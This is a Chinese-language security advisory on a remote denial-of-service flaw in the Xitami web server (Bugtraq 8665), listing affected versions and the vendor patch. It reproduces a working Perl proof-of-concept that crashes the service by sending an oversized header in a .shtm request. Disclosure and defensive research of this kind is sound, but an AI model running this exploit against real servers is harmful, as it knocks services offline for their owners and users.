首页 -> 安全研究

安全研究

安全漏洞
Imatix Xitami超长头字段远程拒绝服务攻击漏洞

发布日期:2003-09-22
更新日期:2003-10-08

受影响系统:
Imatix Xitami 2.5b4
Imatix Xitami 2.4d9
不受影响系统:
Imatix Xitami 2.5b6
Imatix Xitami 2.4d10
描述:
BUGTRAQ  ID: 8665

Xitami Webserver是一种小型WEB服务程序,可使用在Windows操作系统上。

Xitami在处理.shtm文件请求时对HTTP头字段缺少充分检查,远程攻击者可以利用这个漏洞对WEB服务进行拒绝服务攻击。

当服务器接收到.shtm文件请求,如果包含的HTTP头字段超出5154字节,并追加":"符号,就会导致发生程序异常而退出,精心构建提交数据可能以WEB权限执行任意指令。

<*来源:Oliver Karow (Oliver.karow@gmx.de
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=106424194200320&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Oliver Karow (Oliver.karow@gmx.de)提供了如下测试方法:

#!/usr/local/bin/perl
#
# Simple exploit for Imatix Xitami Webserver on Windows NT  
#
# Sending a GET request for a *.shtm file with a header field of >= 5154 bytes, followed by a ":",
# will crash the service.
#
# Vulnerable versions:
# - Xitami 2.5B4 (bw3225b4.exe)
# - Xitami 2.5B4 (bs3225b4.exe)
# - Xitami 2.4D9 (bw3224d9.exe)
# - others?
#
# For legal purposes only !
#
# 22.09.2003 - Oliver Karow - oliver.karow[AT]gmx.de

use IO::Socket;

$ip="127.0.0.1";
$port=80;

$var="A" x 5157;

$mySocket=IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$ip,
PeerPort=>$port, Timeout=>5);
$mySocket->autoflush(1);
  print $mySocket "GET /test.shtm HTTP/1.0\r\n".
        $var.": */*\r\n\r\n";

@answer=<$mySocket>;
$length=@answer;
if ($length==0){die "\nService killed!\n";}
print @answer;

建议:
厂商补丁:

Imatix
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载新的Xitami (2.4d10 and 2.5b6)版本:

http://www.xitami.com

浏览次数:2952
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障